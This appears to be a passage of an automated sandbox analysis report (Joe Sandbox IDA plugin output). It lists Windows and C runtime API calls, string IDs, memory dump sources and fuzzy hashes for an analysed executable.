                                                                                                      • _free.LIBCMT ref: 00EACE54
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID: Xb
                                                                                                      • API String ID: 161543041-727557700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Pb
                                                                                                      • API String ID: 269201875-455994757
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00E9F7C0
                                                                                                      • _free.LIBCMT ref: 00E9F7D6
                                                                                                      • _free.LIBCMT ref: 00E9F7E7
                                                                                                      • _free.LIBCMT ref: 00E9F7F8
                                                                                                      • _free.LIBCMT ref: 00E9F80F
                                                                                                      • GetCPInfo.KERNEL32(?,?), ref: 00E9F857
                                                                                                        • Part of subcall function 00EA90AF: _free.LIBCMT ref: 00EA911A
                                                                                                      • _free.LIBCMT ref: 00E9FA2E
                                                                                                      • _free.LIBCMT ref: 00E9FA41
                                                                                                      • _free.LIBCMT ref: 00E9FA4F
                                                                                                      • _free.LIBCMT ref: 00E9FA5A
                                                                                                      • _free.LIBCMT ref: 00E9FA9C
                                                                                                      • _free.LIBCMT ref: 00E9FAA4
                                                                                                      • _free.LIBCMT ref: 00E9FAAC
                                                                                                      • _free.LIBCMT ref: 00E9FAB4
                                                                                                      • _free.LIBCMT ref: 00E9FAC2
                                                                                                        • Part of subcall function 00EA9261: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,00ECA8C8,00000000,00000000,3FFFFFFF,?,?,00000004,00000000,00000001,00ECA8C8,0000007F,?,3FFFFFFF), ref: 00EA92A9
                                                                                                        • Part of subcall function 00EA9261: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00EA931E
                                                                                                        • Part of subcall function 00EA9261: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA9330
                                                                                                        • Part of subcall function 00EA9261: __freea.LIBCMT ref: 00EA9339
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 607174680-0
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B65F
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B681
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B6A1
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B80A
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B822
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B844
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B849
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E4B84E
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8$false$true$}Z
                                                                                                      • API String ID: 3742692055-4066095532
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00EED39C,00000FA0,?,?,00E8D52A), ref: 00E8D558
                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00E8D52A), ref: 00E8D563
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E8D52A), ref: 00E8D574
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E8D586
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E8D594
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E8D52A), ref: 00E8D5B7
                                                                                                      • DeleteCriticalSection.KERNEL32(00EED39C,00000007,?,?,00E8D52A), ref: 00E8D5D3
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00E8D52A), ref: 00E8D5E3
                                                                                                      Strings
                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E8D55E
                                                                                                      • WakeAllConditionVariable, xrefs: 00E8D58C
                                                                                                      • SleepConditionVariableCS, xrefs: 00E8D580
                                                                                                      • kernel32.dll, xrefs: 00E8D56F
                                                                                                      Similarity
                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E965E6
                                                                                                      • DName::operator+.LIBCMT ref: 00E9671C
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::operator+.LIBCMT ref: 00E966D2
                                                                                                      • DName::operator+.LIBCMT ref: 00E96768
                                                                                                      • DName::operator+.LIBCMT ref: 00E96777
                                                                                                      • DName::operator+.LIBCMT ref: 00E968A4
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E968E4
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E968FC
                                                                                                      • DName::operator+.LIBCMT ref: 00E9690B
                                                                                                      • DName::operator+.LIBCMT ref: 00E96917
                                                                                                        • Part of subcall function 00E97E1C: Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1043660730-0
                                                                                                      APIs
                                                                                                      • Replicator::operator[].LIBVCRUNTIME ref: 00E97E59
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Replicator::operator[]
                                                                                                      • String ID: -m$@$`F$generic-type-$template-parameter-
                                                                                                      • API String ID: 3676697650-3843975421
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EB328D,000000FF), ref: 00E33E4A
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E33E7B
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33E9C
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E33ECB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33ED7
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 00E33EF5
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,00000000,00000000), ref: 00E33F02
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E33F10
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33F23
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33F96
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseHandleLeaveWait$EnterEventMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 1751207877-1769526761
                                                                                                      • Opcode ID: 513b8c8341a82d08d5a190613827dd9948dc3a2fed093465de8df1aa09f9dd01
                                                                                                      • Instruction ID: cbeef5bd20a921bc1730dff5f43007d3646933d94a9bcaa469bc3f741b7cf2b2
                                                                                                      • Opcode Fuzzy Hash: 513b8c8341a82d08d5a190613827dd9948dc3a2fed093465de8df1aa09f9dd01
                                                                                                      • Instruction Fuzzy Hash: A151AC30A04344DFDB21DF66C848BABBFF0BF05318F04061DE456A76A0D7B5A948CB60
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E97126
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97131
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E9713C
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97224
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E97241
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E9725E
                                                                                                      • DName::operator+.LIBCMT ref: 00E97273
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 00E9728D
                                                                                                      • DName::operator+.LIBCMT ref: 00E97354
                                                                                                        • Part of subcall function 00E933AC: DName::DName.LIBVCRUNTIME ref: 00E933C1
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3679549980-2505862506
                                                                                                      • Opcode ID: b74adf27d26232a25aa716088a776b573c310c8db807ed823c8d6f5f800f4929
                                                                                                      • Instruction ID: a478b7b6b1e65b6154a93932b707766541e1961f43008e8f993df872ea01a801
                                                                                                      • Opcode Fuzzy Hash: b74adf27d26232a25aa716088a776b573c310c8db807ed823c8d6f5f800f4929
                                                                                                      • Instruction Fuzzy Hash: 8A91FCB1C28209AADF14EBB4D98ABFE77B8BF01304F10211AF581B6191DB759E0DD761
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3943753294-2505862506
                                                                                                      • Opcode ID: fc22d131d849f925954406d24fce1c5aa63c21e72d592c47e14181c126aa0727
                                                                                                      • Instruction ID: d6e66c045e3a2a6624c91f4a428f2edc2ddff1b2d9201f29e4f65625e93b0e78
                                                                                                      • Opcode Fuzzy Hash: fc22d131d849f925954406d24fce1c5aa63c21e72d592c47e14181c126aa0727
                                                                                                      • Instruction Fuzzy Hash: 88515C31900619CFCF14EF68C5856AAB7B4FF49314B24559AE84EBB251C770ED41CBB1
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Pb$Tb
                                                                                                      • API String ID: 269201875-3647137708
                                                                                                      • Opcode ID: 086bb6ecf1dfa244ebdb4e401d13de94eb7c2fa60598ed0b3722a91aa3490cd0
                                                                                                      • Instruction ID: e68e1a87ed0d9dd0b9e78a7ec0da01deac94c4f3ef3cb92e9e06a7aa2b8627b5
                                                                                                      • Opcode Fuzzy Hash: 086bb6ecf1dfa244ebdb4e401d13de94eb7c2fa60598ed0b3722a91aa3490cd0
                                                                                                      • Instruction Fuzzy Hash: 29619275900219AFDB20DF74C881BAAB7F5AB4E720F24516AF944FF291E770AD418B90
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EB328D,000000FF), ref: 00E33E4A
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E33E7B
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33E9C
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E33ECB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33ED7
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 00E33EF5
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E33F23
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E33F96
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseHandleLeave$EnterEventMultipleObjectsTerminateThreadWait
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 3905900015-1769526761
                                                                                                      • Opcode ID: 24eab1ec318f0d4308c35a1a62bc40b295db3acf76f0ab3c6b3bca8adb2f085d
                                                                                                      • Instruction ID: 9c52c5a271fbb57d5aa29240c1a4c512600648e6ebf21ab5527f74e3ac16789a
                                                                                                      • Opcode Fuzzy Hash: 24eab1ec318f0d4308c35a1a62bc40b295db3acf76f0ab3c6b3bca8adb2f085d
                                                                                                      • Instruction Fuzzy Hash: CF519E30A04745DFEB21CF66C848BABBFF4AF05318F44061DE446A7A90D7B5A948CBA0
                                                                                                      APIs
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E949F1
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A21
                                                                                                        • Part of subcall function 00E921B4: __aulldvrm.LIBCMT ref: 00E921E5
                                                                                                      • DName::operator+.LIBCMT ref: 00E94A3C
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A49
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A79
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94A83
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94AA7
                                                                                                      Similarity
                                                                                                      • API ID: NameName::$Name::operator+__aulldvrm
                                                                                                      • String ID: bj$bj
                                                                                                      • API String ID: 4069495278-1365651532
                                                                                                      • Opcode ID: ce770dc44a1740b25ea9d078911e39bf783107095f045767de017f62d84e3010
                                                                                                      • Instruction ID: b8c7a40b3c7b5e1904b583f02511e41b8830ff7c46faef812df38a20c1e8ae1a
                                                                                                      • Opcode Fuzzy Hash: ce770dc44a1740b25ea9d078911e39bf783107095f045767de017f62d84e3010
                                                                                                      • Instruction Fuzzy Hash: 5831CEB1988208AEDF08CBA4DC91EED7BF5FB19310F04614DE552772D1EBB0598ACB58
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464150960-0
                                                                                                      • Opcode ID: 80e05bbe2859309d4b356a92c9c349a6dbbd1df068aadc3ba75c11b2919fef2e
                                                                                                      • Instruction ID: da9d4fadd760f634677a6dcc4f57bf1f1e227452fdfa870d7d592405bb78f049
                                                                                                      • Opcode Fuzzy Hash: 80e05bbe2859309d4b356a92c9c349a6dbbd1df068aadc3ba75c11b2919fef2e
                                                                                                      • Instruction Fuzzy Hash: DFD15BB1C0020AAFCF14DFA4CA99AFEBBB8AB44308F10A15ED512B7251D7755B49CF91
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 72672806cebfe71a6e91f7a2087f7b433449dbfa6092085e20b274324d6a4ee3
                                                                                                      • Instruction ID: d5f7f5b730dc65ae55adfe3e271c7df8bda5d1cf9b8566b045dad72e82e7ec3b
                                                                                                      • Opcode Fuzzy Hash: 72672806cebfe71a6e91f7a2087f7b433449dbfa6092085e20b274324d6a4ee3
                                                                                                      • Instruction Fuzzy Hash: 7121A7B690010CAFCF41EF94CA81DDD7BB9AF89340B0051A6F515AF161EB75EA548B80
                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00E91288
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00E913B9
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00E9148B
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00E9150F
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00E9152A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwind
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 1184646756-393685449
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3409252457-0
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4A0C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4A0EB
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4A10B
                                                                                                      • __Getctype.LIBCPMT ref: 00E4A1A1
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4A1C0
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4A1D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                      • String ID: [8
                                                                                                      • API String ID: 1102183713-3360502610
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8ECF7
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8ECFF
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8ED88
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8EDB3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00E8EE08
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: `F$csm
                                                                                                      • API String ID: 1170836740-3340950636
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      • _free.LIBCMT ref: 00EA2A55
                                                                                                      • _free.LIBCMT ref: 00EA2A6E
                                                                                                      • _free.LIBCMT ref: 00EA2AA0
                                                                                                      • _free.LIBCMT ref: 00EA2AA9
                                                                                                      • _free.LIBCMT ref: 00EA2AB5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorLast
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3291180501-2505862506
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(00911CD0,00911CD0,?,7FFFFFFF,?,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?,00911CD0), ref: 00EB22CC
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000009,00911CD0,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB234F
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000001,00911CD0,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB23C5
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000009,00EB24C4,00911CD0,00000000,00000000,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB23DC
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • MultiByteToWideChar.KERNEL32(00911CD0,00000001,00EB24C4,00911CD0,00000000,00911CD0,?,00EB24C4,00911CD0,00911CD0,?,00911CD0,?,?,?,?), ref: 00EB2440
                                                                                                      • __freea.LIBCMT ref: 00EB246B
                                                                                                      • __freea.LIBCMT ref: 00EB2477
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829977744-0
                                                                                                      APIs
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E32676
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E326EA
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E3278E
                                                                                                      • LocalFree.KERNEL32(00000000,-00000001,00000000,?,00000400,?,00000000,00000000,AB1AAB9C), ref: 00E328B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$FormatFreeLocalMessage
                                                                                                      • String ID: @a$Unknown error (%d)
                                                                                                      • API String ID: 1902725900-3018888374
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free_strpbrk
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 3300345361-3972193922
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(00000010,00000000,00000000,?,?,?,?,?,?,?,00EA5AC9,00000000,00000000,00000000,00000000,00000000), ref: 00EA537F
                                                                                                      • __fassign.LIBCMT ref: 00EA53FE
                                                                                                      • __fassign.LIBCMT ref: 00EA541D
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EA544A
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00EA5AC9), ref: 00EA546A
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00EA5AC9), ref: 00EA54A4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E937F1
                                                                                                      • DName::operator+.LIBCMT ref: 00E93844
